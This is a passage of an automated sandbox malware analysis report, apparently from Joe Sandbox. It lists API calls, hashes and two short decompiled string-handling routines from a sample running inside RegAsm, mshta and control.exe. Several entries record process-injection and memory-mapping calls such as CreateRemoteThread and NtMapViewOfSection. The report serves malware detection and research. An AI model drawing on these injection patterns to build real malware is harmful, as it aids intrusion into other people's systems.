Opcode Fuzzy Hash: 8e879c1f8d0cca27aff10ed50c22c3dac6f9075010e4f94862715b6333cce08e
Instruction Fuzzy Hash: 5241F33751031EFEDB21EF68EC51FAF3A69AB44750F044012F906AA190DE71C9F59BA1

Uniqueness

Uniqueness Score: -1.00%

Function 03F172B6, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F08CA9: lstrlenW.KERNEL32(?), ref: 03F08CCD
Part of subcall function 03F08CA9: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03F08CDF
Part of subcall function 03F08CA9: wcstombs.NTDLL ref: 03F08CED
Part of subcall function 03F08CA9: lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 03F08D11
Part of subcall function 03F08CA9: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 03F08D26
Part of subcall function 03F08CA9: mbstowcs.NTDLL ref: 03F08D33
Part of subcall function 03F08CA9: HeapFree.KERNEL32(00000000,00000000), ref: 03F08D45
Part of subcall function 03F08CA9: HeapFree.KERNEL32(00000000,00000000,?,?), ref: 03F08D5F

GetLastError.KERNEL32 ref: 03F17355

Part of subcall function 03F04A1D: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?), ref: 03F04ACF
Part of subcall function 03F04A1D: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?), ref: 03F04AF3
Part of subcall function 03F04A1D: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?), ref: 03F04B01

HeapFree.KERNEL32(00000000,?), ref: 03F17371
HeapFree.KERNEL32(00000000,?), ref: 03F17382
SetLastError.KERNEL32(00000000), ref: 03F17385

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
String ID:
API String ID: 3867366388-0
Opcode ID: 1af17ac4a66d8168c7e06c5df0750063d01218bc869172002f7c96a7c0d778c3
Instruction ID: 1cc9677792080009360c3a30af6d38c3c98fbaa549560085ae7ecf1e9c3b686c
Opcode Fuzzy Hash: 1af17ac4a66d8168c7e06c5df0750063d01218bc869172002f7c96a7c0d778c3
Instruction Fuzzy Hash: 43311832900219EFCF22EF99EC448DEBFB5EF44320B144166F925A6160C3719AA5AF90

Uniqueness

Uniqueness Score: -1.00%

Function 03F075F8, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F10077: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,03F0762E,?,?,?,?,?), ref: 03F100D0
Part of subcall function 03F10077: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,03F0762E,?,?,?,?,?), ref: 03F100EE
Part of subcall function 03F10077: RtlAllocateHeap.NTDLL(00000000,74E06985,?), ref: 03F10117
Part of subcall function 03F10077: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,03F0762E,?,?,?,?,?), ref: 03F1012E
Part of subcall function 03F10077: HeapFree.KERNEL32(00000000,00000000), ref: 03F10141
Part of subcall function 03F10077: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,03F0762E,?,?,?,?,?), ref: 03F10150

GetLastError.KERNEL32 ref: 03F07697

Part of subcall function 03F04A1D: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?), ref: 03F04ACF
Part of subcall function 03F04A1D: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?), ref: 03F04AF3
Part of subcall function 03F04A1D: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?), ref: 03F04B01

HeapFree.KERNEL32(00000000,?), ref: 03F076B3
HeapFree.KERNEL32(00000000,?), ref: 03F076C4
SetLastError.KERNEL32(00000000), ref: 03F076C7

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
String ID:
API String ID: 2451549186-0
Opcode ID: f812b117a51c20da9b66773b8e0f009fbe8291280009f0e22c1928076a24ada0
Instruction ID: 956d3bfcdbbf7a152cd46c0ca2ece08170f2a2099b6cbfb6349447594d35d3f0
Opcode Fuzzy Hash: f812b117a51c20da9b66773b8e0f009fbe8291280009f0e22c1928076a24ada0
Instruction Fuzzy Hash: 11310632900119EFCF22EFADD844CDEBFB5EF54350B144196F926A61A0C7719A61EF90

Uniqueness

Uniqueness Score: -1.00%

Function 03F22203, Relevance: 5.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03F2224E
memset.NTDLL ref: 03F22265
memset.NTDLL ref: 03F2227C
memset.NTDLL ref: 03F22294

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 305823ba3af659b523b98240330da8bb6a93e1d9af7caa73e7b6000762ee0bd2
Instruction ID: fffb9a2dc4821ec2dee207f37730a3644ce04f236dd71db8d8027a6ab66bf27f
Opcode Fuzzy Hash: 305823ba3af659b523b98240330da8bb6a93e1d9af7caa73e7b6000762ee0bd2
Instruction Fuzzy Hash: 4221A17290151EFBDB60DF90EC8096ABB29FF093007490918E94586C90D733F4B0CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 010A47D4, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E010A47D4(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E010A4573(_t2);
				if(_t34 != 0) {
					_t30 = E010A4573(_t28);
					if(_t30 == 0) {
						E010A2625(_t34);
					} else {
						_t39 = _a4;
						_t22 = E010A7967(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E010A7967(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x010a47d4
0x010a47de
0x010a47e0
0x010a47e6
0x010a47e6
0x010a47ef
0x010a47f3
0x010a47ff
0x010a4803
0x010a4877
0x010a4805
0x010a4805
0x010a4809
0x010a4810
0x010a4813
0x010a482d
0x010a481c
0x010a481c
0x010a4820
0x010a4823
0x010a4828
0x010a4828
0x010a4832
0x010a485a
0x010a4860
0x010a4863
0x010a4834
0x010a4836
0x010a483e
0x010a4849
0x010a484e
0x010a484e
0x010a486a
0x010a4871
0x010a4872
0x010a4872
0x010a4803
0x010a4882

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,010A52AF,00000000,00000000,00000000,03409698,?,?,010A31C9,?,03409698), ref: 010A47E0

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

Part of subcall function 010A7967: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,010A480E,00000000,00000001,00000001,?,?,010A52AF,00000000,00000000,00000000,03409698), ref: 010A7975
Part of subcall function 010A7967: StrChrA.SHLWAPI(?,0000003F,?,?,010A52AF,00000000,00000000,00000000,03409698,?,?,010A31C9,?,03409698,0000EA60,?), ref: 010A797F

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,010A52AF,00000000,00000000,00000000,03409698,?,?,010A31C9), ref: 010A483E
lstrcpy.KERNEL32(00000000,00000000), ref: 010A484E
lstrcpy.KERNEL32(00000000,00000000), ref: 010A485A

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 3b47f95277756c7e6820a66d97c406fc998b0f36342e67256a22fdc9dadef8d2
Instruction ID: c75324447fd8a47e51d9bcb3cf31895b9dc4310351f28d9838f80e900ef58fe9
Opcode Fuzzy Hash: 3b47f95277756c7e6820a66d97c406fc998b0f36342e67256a22fdc9dadef8d2
Instruction Fuzzy Hash: E521D276900296EFCB125FF8E844E9E7FE99F15294F8980A4F984EB201D7B5C900C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 03F0A736, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,03F1D371,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,03F21190), ref: 03F0A742

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

Part of subcall function 03F24743: StrChrA.SHLWAPI(00000000,0000002F,00000000,00000000,03F0A770,00000000,00000001,00000001,?,?,03F1D371,00000000,00000000,00000000,00000008,0000EA60), ref: 03F24751
Part of subcall function 03F24743: StrChrA.SHLWAPI(00000000,0000003F,?,?,03F1D371,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,03F21190,00000008,?), ref: 03F2475B

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03F1D371,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 03F0A7A0
lstrcpy.KERNEL32(00000000,00000000), ref: 03F0A7B0
lstrcpy.KERNEL32(00000000,00000000), ref: 03F0A7BC

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: e737fdcb62eeee4ae4f77e04e5f385bab32acbe50b25db64e1f82bd793d7e480
Instruction ID: ddf1bbddf99bc1a241d1fb7f9e68241e74c92b3d4959d0022dcc10f077ed3815
Opcode Fuzzy Hash: e737fdcb62eeee4ae4f77e04e5f385bab32acbe50b25db64e1f82bd793d7e480
Instruction Fuzzy Hash: 2021907A50035AEBCF12EF68DC84AAEBFB9AF46244F088054E9059F251D774C900A7E0

Uniqueness

Uniqueness Score: -1.00%

Function 03F14F8F, Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03F14FC3
memset.NTDLL ref: 03F14FDA
memset.NTDLL ref: 03F14FF1
memset.NTDLL ref: 03F15009

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 261850b658884f2db413fd54b0a4245336d5751821a61d5e734fdc7df961970c
Instruction ID: 3a3d297df095e8ee6d7750d860a55b5b5187afcdde34fc7b72db8b62904aa884
Opcode Fuzzy Hash: 261850b658884f2db413fd54b0a4245336d5751821a61d5e734fdc7df961970c
Instruction Fuzzy Hash: 7411737690050ABFCB20DFD1FC40A66BB68FF0A340B090529F94895821D772F5B59BD1

Uniqueness

Uniqueness Score: -1.00%

Function 010A6044, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A6044(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E010A4573(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x010a6059
0x010a605d
0x010a6067
0x010a606e
0x010a6071
0x010a6073
0x010a607b
0x010a6080
0x010a608e
0x010a6093
0x010a609d

APIs

lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,0340937C,?,010A491C,004F0053,0340937C,?,?,?,?,?,?,010A66F2), ref: 010A6054
lstrlenW.KERNEL32(010A491C,?,010A491C,004F0053,0340937C,?,?,?,?,?,?,010A66F2), ref: 010A605B

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,010A491C,004F0053,0340937C,?,?,?,?,?,?,010A66F2), ref: 010A607B
memcpy.NTDLL(74E069A0,010A491C,00000002,00000000,004F0053,74E069A0,?,?,010A491C,004F0053,0340937C), ref: 010A608E

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 906d9f36d9b33a6ae1bb2e4214180aeefb83239a1834b7c253d66a5cdb0c556a
Instruction ID: 63bb94131b8b7a34b5b054ed0bbb653f563e197731d19cc4282a0a95759fb1b4
Opcode Fuzzy Hash: 906d9f36d9b33a6ae1bb2e4214180aeefb83239a1834b7c253d66a5cdb0c556a
Instruction Fuzzy Hash: 65F04F36900119BBCF10DFE9CC44CDF7BADEF082A4B454062F904D7101E771EA108BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F0714D, Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(69B25F44,?,?,00000000,03F02D2F,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 03F0715E
lstrlen.KERNEL32(?), ref: 03F07163

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

memcpy.NTDLL(00000000,?,00000000,?), ref: 03F0717F
lstrcpy.KERNEL32(00000000,?), ref: 03F0719D

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcpymemcpy
String ID:
API String ID: 1697500751-0
Opcode ID: 911dcb78e3588cac8b3604139fc662c6f801ce52088cae270d48e9306882e6f8
Instruction ID: 0d2fe5b9f2a7e84e13f263dd04ac1e6f6a0496b7257d93bfb8fcc08af064a851
Opcode Fuzzy Hash: 911dcb78e3588cac8b3604139fc662c6f801ce52088cae270d48e9306882e6f8
Instruction Fuzzy Hash: 41F02D7A800B42BBD322FA6DDC48E1BFB98ABC5210B080155E90483240D321E0189BB1

Uniqueness

Uniqueness Score: -1.00%

Function 010A347A, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0340887A,00000000,00000000,00000000,010A2E3B,00000000), ref: 010A348A
lstrlen.KERNEL32(?), ref: 010A3492

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

lstrcpy.KERNEL32(00000000,0340887A), ref: 010A34A6
lstrcat.KERNEL32(00000000,?), ref: 010A34B1

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: b2976e0ea28d4dab2350dc3b886d58998fc88cb31560aa7a81f5ebccd79c8bf8
Instruction ID: d1b3780e0a9d3f24ba4af996793ea1a77969c677d1c44db77524d61321005c20
Opcode Fuzzy Hash: b2976e0ea28d4dab2350dc3b886d58998fc88cb31560aa7a81f5ebccd79c8bf8
Instruction Fuzzy Hash: 64E09233A01A21AB87215BE89C48C9FBBACEF996913454816F780D3104C769D804CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 03F0BA42, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(043A9986,00000000,74E481D0,00000000,03F05A57,00000000), ref: 03F0BA52
lstrlen.KERNEL32(?), ref: 03F0BA5A

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

lstrcpy.KERNEL32(00000000,043A9986), ref: 03F0BA6E
lstrcat.KERNEL32(00000000,?), ref: 03F0BA79

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 53d46a8803812c9f251743fc875c5866ca8bdb7c8eda642507d6d65fbebbd660
Instruction ID: b5e7216df5149b7f91d813efd15a1a2bdba57a6c0cb53aa6bf08a31a97f240c0
Opcode Fuzzy Hash: 53d46a8803812c9f251743fc875c5866ca8bdb7c8eda642507d6d65fbebbd660
Instruction Fuzzy Hash: 06E09273901269EB8721EFE8AC48C6FFBACEFA9611304041AFA00D3114C765C800ABA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exe PID: 2928 Parent PID: 3352 mshta.exeCOMMON

Executed Functions

Function 000002BC08F20FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000003.418752471.000002BC08F20000.00000010.00000001.sdmp, Offset: 000002BC08F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_2bc08f20000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 6e3339e8276f7c5a0da58e6cec7b01ee0dfd76a07728157585d2b2ba13efff47
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 9F9002054D981695D41421E10C4925C6140A3C8250FE488904516D0544D94D12971192

Uniqueness

Uniqueness Score: -1.00%

Function 000002BC08F20FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000003.418752471.000002BC08F20000.00000010.00000001.sdmp, Offset: 000002BC08F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_2bc08f20000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 6e3339e8276f7c5a0da58e6cec7b01ee0dfd76a07728157585d2b2ba13efff47
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 9F9002054D981695D41421E10C4925C6140A3C8250FE488904516D0544D94D12971192

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: control.exe PID: 5676 Parent PID: 5696 control.exeCOMMON

Executed Functions

Function 00E7B58C, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 643
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 00E7BA5F

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c1ca57dcf3e72e3f5c3e432a911dc8291566d91973d524fb1b92ef7a8516f799
Instruction ID: 5727f643fbcfb9f1067e95b038df7ca0ea5b3724b4623a44c59cca30f7a20417
Opcode Fuzzy Hash: c1ca57dcf3e72e3f5c3e432a911dc8291566d91973d524fb1b92ef7a8516f799
Instruction Fuzzy Hash: 5A129430618E098FDB68DF28D885BA6B3E1FB98305F40562EE94ED3255DF34E945CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00E6AC44, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationToken.NTDLL ref: 00E6ACF8
NtQueryInformationToken.NTDLL ref: 00E6AD40
NtClose.NTDLL ref: 00E6AD78

Strings

0, xrefs: 00E6ACA3

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: InformationQueryToken$Close
String ID: 0
API String ID: 459398573-4108050209
Opcode ID: 35ee677b0cbb54bf467b7fca8d9bcc29aae1a540e3b10aabd7638c4642f0cb5e
Instruction ID: bddcfb89ebf7fa32e3837b74ee96ec7f370682824ed3e7030fac765a4973003e
Opcode Fuzzy Hash: 35ee677b0cbb54bf467b7fca8d9bcc29aae1a540e3b10aabd7638c4642f0cb5e
Instruction Fuzzy Hash: DC312C30618B488FD764EF68D8C479AB7E1FBD8305F44492EE48AC3250CB359945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00E73C1C, Relevance: 6.2, APIs: 4, Instructions: 197
nativethreadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationProcess.NTDLL ref: 00E73CE6
CreateRemoteThread.KERNELBASE ref: 00E73D96

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: CreateInformationProcessRemoteThread
String ID:
API String ID: 3020566308-0
Opcode ID: 335c0fbfd3a133f5344b7f25a6bd536f2dade5f8aa3444d8c36b6ab010c73096
Instruction ID: 970c9ed6eeb497e1d77c81f80846fb1e3016ae0e9a7d20a278d743f58f8ef14d
Opcode Fuzzy Hash: 335c0fbfd3a133f5344b7f25a6bd536f2dade5f8aa3444d8c36b6ab010c73096
Instruction Fuzzy Hash: 4451B530618B058FD7A8EF78D8896AA77E1FB99305F00942EE94ED3251EF34DD418B52

Uniqueness

Uniqueness Score: -1.00%

Function 00E686D0, Relevance: 4.0, APIs: 2, Instructions: 1012
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExA.KERNEL32 ref: 00E6879B
GetUserNameA.ADVAPI32 ref: 00E68A47

Part of subcall function 00E60AC0: CreateThread.KERNELBASE ref: 00E60AF0
Part of subcall function 00E60AC0: QueueUserAPC.KERNELBASE ref: 00E60B07

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: CreateUser$MutexNameQueueThread
String ID:
API String ID: 2503873790-0
Opcode ID: db927e127c7b0f3f56bad06dadfac885180d990bb5282409794a2e9ab56c7683
Instruction ID: 36bc16505ec7410f0a7b6183904332006f8de3613e2729aecb7f84533a52b359
Opcode Fuzzy Hash: db927e127c7b0f3f56bad06dadfac885180d990bb5282409794a2e9ab56c7683
Instruction Fuzzy Hash: 8562D871658B088FD768EF28FC856A573E1F798740B20552ED48BD3262DE38D947CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00E5E614, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 00E5E7B6

Part of subcall function 00E70E70: NtMapViewOfSection.NTDLL ref: 00E70EBC

Strings

0, xrefs: 00E5E7AA

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: Section$CreateView
String ID: 0
API String ID: 1585966358-4108050209
Opcode ID: a06b84d0697dfc3af9746c6f8fa46acacf74ba93af59b7789b5bbf4be6daab63
Instruction ID: 5f719c0d616d7907947733671bbebe2791ad542dbf7e9ff18c9cd87ab0ab01c6
Opcode Fuzzy Hash: a06b84d0697dfc3af9746c6f8fa46acacf74ba93af59b7789b5bbf4be6daab63
Instruction Fuzzy Hash: 2761F73161CF088FDB68EF68D889A6577E1FB98301F10492EDC4AC7261DB34E941CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00E56140, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL ref: 00E5617D

Strings

@, xrefs: 00E56161

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: d2f16140275c093ab24588ae730b4c6a8023adfb99b3b597d0092d925e8a52e0
Instruction ID: 6619190691c9d100fda5c9536ba7fe8617bba274c6f0b4fb0079b9400cf65a85
Opcode Fuzzy Hash: d2f16140275c093ab24588ae730b4c6a8023adfb99b3b597d0092d925e8a52e0
Instruction Fuzzy Hash: B7F09070615B048BDB449FA8D8CC63A77E0F758305F500D2CE51ADB255DB78990C8745

Uniqueness

Uniqueness Score: -1.00%

Function 00E8F01F, Relevance: 3.3, APIs: 2, Instructions: 331
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 00E8F27A
NtProtectVirtualMemory.NTDLL ref: 00E8F309

Memory Dump Source

Source File: 0000001C.00000002.542555472.0000000000E8F000.00000040.00020000.sdmp, Offset: 00E8F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e8f000_control.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 1b87bfe0c9f9fdb302b23706cddc4f6e8e7ec3a2dfac98415dee70d8beedd276
Instruction ID: 95a67ed7e11c9d9fa6ee33265d2b610f64bd9992678479c64a7b304ed118f482
Opcode Fuzzy Hash: 1b87bfe0c9f9fdb302b23706cddc4f6e8e7ec3a2dfac98415dee70d8beedd276
Instruction Fuzzy Hash: 5AA1383121CB888FC725EF28D8816A9B3E1FB95314F58557ED0CFD7252D634E8468742

Uniqueness

Uniqueness Score: -1.00%

Function 00E5FF60, Relevance: 3.2, APIs: 2, Instructions: 183
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 00E5FF8B
NtQueryInformationProcess.NTDLL ref: 00E5FFD5

